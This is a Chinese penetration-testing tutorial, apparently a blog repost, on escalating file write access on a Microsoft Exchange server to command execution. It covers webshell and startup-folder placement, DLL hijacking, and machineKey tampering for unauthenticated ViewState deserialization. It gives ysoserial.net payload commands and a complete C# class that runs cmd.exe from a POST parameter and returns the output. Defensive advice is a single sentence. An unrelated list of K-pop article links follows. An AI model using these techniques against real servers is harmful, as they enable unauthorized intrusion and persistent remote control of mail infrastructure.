渗透技巧——从Exchange文件读写权限到命令执行
yund56 2025-05-21 05:35 42 浏览
0x00 前言
在实际的渗透测试过程中,我们会遇到各种不同的环境,例如获得了Exchange服务器的文件读写权限,但是无法执行命令。
本文将要提供一种实现方法,分析利用思路,介绍脚本开发的细节,给出防御建议。
0x01 简介
本文将要介绍以下内容:
· 解决思路
· 利用方法
· 程序实现
· 防御建议
0x02 解决思路
1.常规解决思路
(1)写入Webshell
通常选择以下两个位置:
· %ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth
· %ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth
选择这两个位置的优点是可以直接访问Webshell。
也可以选择其他位置,例如%ExchangeInstallPath%\ClientAccess\ecp\,写入的文件名称有限制,命令规则可参考%ExchangeInstallPath%\ClientAccess\ecp\web.config。
注:
访问%ExchangeInstallPath%\ClientAccess\下的webshell需要添加合法用户的登录Cookie。
总的来说,通过写入Webshell的方式比较直接,但是Exchange服务器有可能禁用了命令执行权限或是拦截系统函数的调用,依旧无法获得命令执行权限。
(2)写入PE文件
写入exe文件,可选择以下两种启动文件夹:
· 系统启动文件夹的位置:%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup
· 用户启动文件夹的位置:%USERPROFILE%\Appdata\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
写入dll文件,可选择系统常见的dll劫持位置,例如c:\Windows\System32\fxsst.dll,更多细节可参考:
https://github.com/3gstudent/Pentest-and-Development-Tips/blob/master/README-en.md#
method-16-windows-fax-dll-injection
总的来说,通过写入PE文件的方式比较被动,需要等待系统加载,无法做到实时的命令执行。
2.有效的解决思路
修改Exchange配置,设置MachineKey,通过.Net反序列化实现命令执行
可供学习的资料:
· http://www.zcgonvh.com/post/weaponizing_CVE-2020-0688_and_about_dotnet_deserialize_vulnerability.html
· https://blog.knownsec.com/2020/11/net-%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e4%b9%8b-viewstate-%e5%88%a9%e7%94%a8/
简单来说,我们通过设置MachineKey,就能够实现与CVE-2020-0688同样的效果,也就是说,设置MachineKey为默认值后,可以直接使用CVE-2020-0688的利用工具实现命令执行。
0x03 利用方法
1.修改%ExchangeInstallPath%\ClientAccess\ecp\web.config
将:
修改为:
如果没有这一属性,那么就在system.web下添加:
接下来就可以直接使用CVE-2020-0688的利用工具,成熟的利用工具可选择:
https://github.com/zcgonvh/CVE-2020-0688/,相比其它已开源的利用工具,这款工具能够实时获得命令执行结果,也支持加载shellcode的功能,其中的技术细节值得深入研究。
注:
CVE-2020-0688的利用工具大都借助ysoserial.net的
TextFormattingRunProperties实现命令执行,无法实时获得命令执行结果。
ysoserial.net-1.32的
ActivitySurrogateSelectorFromFile能够通过Assembly.Load加载.Net程序集实现返回命令执行的结果,但是兼容性不够,无法做到支持所有版本的.Net环境。
zcgonvh开源的CVE-2020-0688利用工具解决了ysoserial.net-1.32中
ActivitySurrogateSelectorFromFile兼容性的问题,同时对通信数据做了AES加密。
ysoserial.net-1.33修复了
ActivitySurrogateSelectorFromFile兼容性的bug,bug由zcgonvh修复。
我们知道,CVE-2020-0688的利用前提是需要掌握一个合法用户的凭据,而我们只获得了Exchange服务器的文件读写权限,还无法立即获得合法用户的凭据,这里可以使用接下来的两种方法绕过这个限制。
(1)修改%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\web.config
这里validationKey和decryptionKey可以任意指定,字符范围为十六进制,即0~F。
也可以选用以下算法:
· MD5
· AES
· HMACSHA256
· HMACSHA384
· HMACSHA512
密钥长度需要符合算法要求,学习资料:
https://devblogs.microsoft.com/aspnet/cryptographic-improvements-in-asp-net-4-5-pt-1/
(2)修改%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\web.config
方法同上。
对于这两个位置的.Net反序列化命令执行,不再需要合法用户的凭据,所以利用程序也需要做修改。下面介绍三种利用程序实现的细节。
0x04 实现细节
1.计算VIEWSTATEGENERATOR的两种方法
Exchange的.Net反序列化用的是ViewState,其中必备的参数为VIEWSTATEGENERATOR,例如Python实现的CVE-2020-0688利用工具中使用的默认VIEWSTATEGENERATOR为B97B4E27,表示的页面为ecp/default.aspx,对应的ysoserial.net的参数为--path="/ecp/default.aspx" --apppath="/ecp/"
下面介绍两种计算VIEWSTATEGENERATOR的方法:
C#实现的代码如下:
using System;
class a
{
static void Main(string[] args)
{
int hashcode = StringComparer.InvariantCultureIgnoreCase.GetHashCode("/ecp");
uint _clientstateid=(uint)(hashcode
+StringComparer.InvariantCultureIgnoreCase.GetHashCode("default_aspx"));
Console.WriteLine(_clientstateid.ToString("X2"));
}
}得出结果为B97B4E27。
注:
代码来自
http://www.zcgonvh.com/post/weaponizing_CVE-2020-0688_and_about_dotnet_deserialize_vulnerability.html
也可以通过网页自动计算,方法如下:
在实际测试环境中,修改ecp/default.aspx的内容如下:
通过浏览器访问该页面,返回结果中的__VIEWSTATEGENERATOR即为计算后的结果。
2.不需要合法用户凭据的三种反序列化程序实现。
(1)借助ysoserial.net的
TextFormattingRunProperties实现命令执行的Python代码。
CVE-2020-0688中对应ysoserial.net的参数格式如下:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{command}" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="{generator}" --viewstateuserkey="{}"由于我们的利用不需要合法用户的凭据,新的ysoserial.net参数格式为:
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "{command}" --validationalg="SHA1" --validationkey="{key}" --generator="{generator}"参数说明如下:
· {command}对应我们要执行的命令
· {key}对应我们设置的validationKey
· {generator}对应要访问页面的VIEWSTATEGENERATOR
借助ysoserial.net的
TextFormattingRunProperties生成最终的VIEWSTATE数据后,拼接成以下格式:
https://{url}?__VIEWSTATEGENERATOR={generator}&__VIEWSTATE={out_payload}发送GET数据包即可。
下面举例进行说明:
选择Exchange默认的错误页面:%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx
owa\auth\errorFE.aspx对应的VIEWSTATEGENERATOR为042A94E8
借助ysoserial.net的
TextFormattingRunProperties生成最终的VIEWSTATE数据。
最终访问的URL为:https://
完整的实现代码已上传至github,地址如下:
https://github.com/3gstudent/Homework-of-Python/blob/master/ExchangeDeserializeShell-NoAuth-TextFormattingRunProperties.py
代码支持两个位置的反序列化执行,分别为默认存在的文件%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx和%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth\TimeoutLogout.aspx
注:
由于我们已获得了Exchange服务器的文件读写权限,这里可以将代码结果输出至指定文件进行查看,命令示例:net user /domain >c:\test.txt
(2)借助ysoserial.net的
ActivitySurrogateSelectorFromFile实现命令执行并返回执行结果的Python代码。
这里使用ysoserial.net的版本需要高于1.32,以避免
ActivitySurrogateSelectorFromFile兼容性的bug。
新建文件ExploitClass.cs,内容如下:
class E
{
public E()
{
System.Web.HttpContext context = System.Web.HttpContext.Current;
context.Server.ClearError();
context.Response.Clear();
try
{
System.Diagnostics.Process process = new System.Diagnostics.Process();
process.StartInfo.FileName = "cmd.exe";
string cmd = context.Request.Form["cmd"];
process.StartInfo.Arguments = "/c " + cmd;
process.StartInfo.RedirectStandardOutput = true;
process.StartInfo.RedirectStandardError = true;
process.StartInfo.UseShellExecute = false;
process.Start();
string output = process.StandardOutput.ReadToEnd();
context.Response.Write(output);
} catch (System.Exception) {}
context.Response.Flush();
context.Response.End();
}
}注:
代码引用自
https://devco.re/blog/2020/03/11/play-with-dotnet-viewstate-exploit-and-create-fileless-webshell/
更多用法可参考
https://github.com/pwntester/ysoserial.net/blob/master/ExploitClass/ExploitClass.cs
ysoserial.net的参数格式如下:
ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;System.Web.dll;System.dll;" --validationalg="SHA1" --validationkey="{key}" --generator="{generator}借助ysoserial.net的
ActivitySurrogateSelectorFromFile生成最终的VIEWSTATE数据后,构造POST数据包,添加名为cmd的参数,参数值为要执行的命令。
高版本的.NET Framework会禁止ActivitySurrogateSelector,可借助
ysoserial.netActivitySurrogateDisableTypeCheck进行绕过,对应的参数格式如下:
ysoserial.exe -p ViewState -g ActivitySurrogateDisableTypeCheck -c "ignore" --validationalg="SHA1" --validationkey="{key}" --generator="{generator}"完整的实现代码已上传至github,地址如下:
· https://github.com/3gstudent/Homework-of-Python/blob/master/ExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.py
代码支持两个位置的反序列化执行,分别为默认存在的文件%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx和%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth\TimeoutLogout.aspx
代码能够执行命令并获得命令执行的结果,通过POST方式以参数__Value发送数据,通信数据采用逐字符异或加密。
(3)基于
https://github.com/zcgonvh/CVE-2020-0688/实现无凭据利用的C#代码
VIEWSTATE数据的生成过程同
https://github.com/zcgonvh/CVE-2020-0688/保持一致,只需要将validationkey作为变量传入即可。
%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\web.config和%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\web.config均没有限制POST请求,所以在利用上不再需要写入空文件,可以直接生成最终的VIEWSTATE数据并通过POST的方式发送数据。
完整的实现代码已上传至github,地址如下:
· https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/SharpExchangeDeserializeShell-NoAuth-Fromzcgonvh.cs
代码支持两个位置的反序列化执行,分别为默认存在的文件%ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth\errorFE.aspx和%ExchangeInstallPath%\FrontEnd\HttpProxy\ecp\auth\TimeoutLogout.aspx
支持的功能同
https://github.com/zcgonvh/CVE-2020-0688/保持一致。
0x05 防御检测
在Exchange服务器被入侵后,不仅需要查杀有无可疑的Webshell,同样需要判断web.config中的machineKey是否被修改。
0x06 小结
本文提供了一种从Exchange文件读写权限到命令执行的实现方法,分析利用思路,介绍三种利用脚本的开发细节,给出防御建议。
相关推荐
- SM小分队Girls on Top,女神战队少了f(x)?
-
这次由SM娱乐公司在冬季即将开演的smtown里,将公司的所有女团成员集结成了一个小分队project。第一位这是全面ACE的大姐成员权宝儿(BoA),出道二十年,在日本单人销量过千万,韩国国内200...
- 韩国女团 aespa 首场 VR 演唱会或暗示 Quest 3 将于 10 月推出
-
AmazeVR宣布将在十月份举办一场现场VR音乐会,观众将佩戴MetaQuest3进行体验。韩国女团aespa于2020年11月出道,此后在日本推出了三张金唱片,在韩国推出了...
- 韩网热议!女团aespa成员Giselle在长腿爱豆中真的是legend
-
身高163的Giselle,长腿傲人,身材比例绝了...
- 假唱而被骂爆的女团:IVE、NewJeans、aespa上榜
-
在韩国,其实K-pop偶像并不被认为是真正的歌手,因为偶像们必须兼备舞蹈能力、也经常透过对嘴来完成舞台。由于科技的日渐发达,也有许多网友会利用消音软体来验证K-pop偶像到底有没有开麦唱歌,导致假唱这...
- 新女团Aespa登时尚大片 四个少女四种style
-
来源:环球网
- 韩国女团aespa新歌MV曝光 画面梦幻造型超美
-
12月20日,韩国女团aespa翻唱曲《DreamsComeTrue》MV公开,视频中,她们的造型超美!WINTER背后长出一双梦幻般的翅膀。柳智敏笑容甜美。宁艺卓皮肤白皙。GISELLE五官精致...
- 女网友向拳头维权,自称是萨勒芬妮的原型?某韩国女团抄袭KDA
-
女英雄萨勒芬妮(Seraphine)是拳头在2020年推出的第五位新英雄,在还没有正式上线时就备受lsp玩家的关注,因为她实在是太可爱了。和其他新英雄不同的是,萨勒芬妮在没上线时就被拳头当成虚拟偶像来...
- 人气TOP女团是?INS粉丝数见分晓;TWICE成员为何在演唱会落泪?
-
现在的人气TOP女团是?INS粉丝数见分晓!现在爱豆和粉丝之间的交流方法变得多种多样,但是Instagram依然是主要的交流手段。很多粉丝根据粉丝数评价偶像的人气,拥有数百、数千万粉丝的组合作为全球偶...
- 韩国女团MVaespa Drama MV_韩国女团穿超短裙子跳舞
-
WelcometoDrama.Pleasefollow4ruleswhilewatchingtheDrama.·1)Lookbackimmediatelywhenyoufe...
- aespa师妹团今年将出道! SM职员亲口曝「新女团风格、人数」
-
记者刘宛欣/综合报导南韩造星工厂SM娱乐曾打造出东方神起、SUPERJUNIOR、少女时代、SHINee、EXO等传奇团体,近年推出的aespa、RIIZE更是双双成为新生代一线团体,深受大众与粉丝...
- 南韩最活跃的女团aespa,新专辑《Girls》即将发布,盘点昔日经典
-
女团aespa歌曲盘点,新专辑《Girls》即将发布,期待大火。明天也就是2022年的7月8号,aespa新专辑《Girls》即将发行。这是继首张专辑《Savage》之后,时隔19个月的第二张专辑,这...
- 章泽天女团aespa出席戛纳晚宴 宋康昊携新片亮相
-
搜狐娱乐讯(山今/文玄反影/图科明/视频)法国时间5月23日晚,女团aespa、宋康昊、章泽天等明星亮相戛纳晚宴。章泽天身姿优越。章泽天肩颈线优越。章泽天双臂纤细。章泽天仪态端正。女团aespa亮...
- Aespa舞台暴露身高比例,宁艺卓脸大,柳智敏有“TOP”相
-
作为SM公司最新女团aespa,初舞台《BlackMamba》公开,在初舞台里,看得出来SM公司是下了大功夫的,虽然之前SM公司新出的女团都有很长的先导片,但是aespa显然是有“特殊待遇”。运用了...
- AESPA女团成员柳智敏karina大美女
-
真队内速度最快最火达成队内首个且唯一两百万点赞五代男女团中输断层第一(图转自微博)...
- 对来学校演出的女团成员语言性骚扰?韩国这所男高的学生恶心透了
-
哕了……本月4日,景福男子高中相关人士称已经找到了在SNS中上传对aespa成员进行性骚扰文章的学生,并开始着手调查。2日,SM娱乐创始人李秀满的母校——景福高中迎来了建校101周年庆典活动。当天,S...
- 一周热门
- 最近发表
-
- SM小分队Girls on Top,女神战队少了f(x)?
- 韩国女团 aespa 首场 VR 演唱会或暗示 Quest 3 将于 10 月推出
- 韩网热议!女团aespa成员Giselle在长腿爱豆中真的是legend
- 假唱而被骂爆的女团:IVE、NewJeans、aespa上榜
- 新女团Aespa登时尚大片 四个少女四种style
- 韩国女团aespa新歌MV曝光 画面梦幻造型超美
- 女网友向拳头维权,自称是萨勒芬妮的原型?某韩国女团抄袭KDA
- 人气TOP女团是?INS粉丝数见分晓;TWICE成员为何在演唱会落泪?
- 韩国女团MVaespa Drama MV_韩国女团穿超短裙子跳舞
- aespa师妹团今年将出道! SM职员亲口曝「新女团风格、人数」
- 标签列表
-
- filter函数js (37)
- filter函数excel用不了 (73)
- 商城开发 (40)
- 影视网站免费源码最新版 (57)
- 影视资源api接口 (46)
- 网站留言板代码大全 (56)
- java版软件下载 (52)
- java教材电子课本下载 (48)
- 0基础编程从什么开始学 (50)
- java是用来干嘛的 (51)
- it入门应该学什么 (55)
- java线上课程 (55)
- 学java的软件叫什么软件 (38)
- 程序开发软件有哪些 (53)
- 软件培训 (59)
- 机器人编程代码大全 (50)
- 少儿编程教程免费 (45)
- 新代系统编程教学 (61)
- 共创世界编程网站 (38)
- 亲测源码 (36)
- 三角函数积分公式表 (35)
- 函数的表示方法 (34)
- 表格乘法的公式怎么设置 (34)
- sumif函数的例子 (34)
- 图片素材 (36)
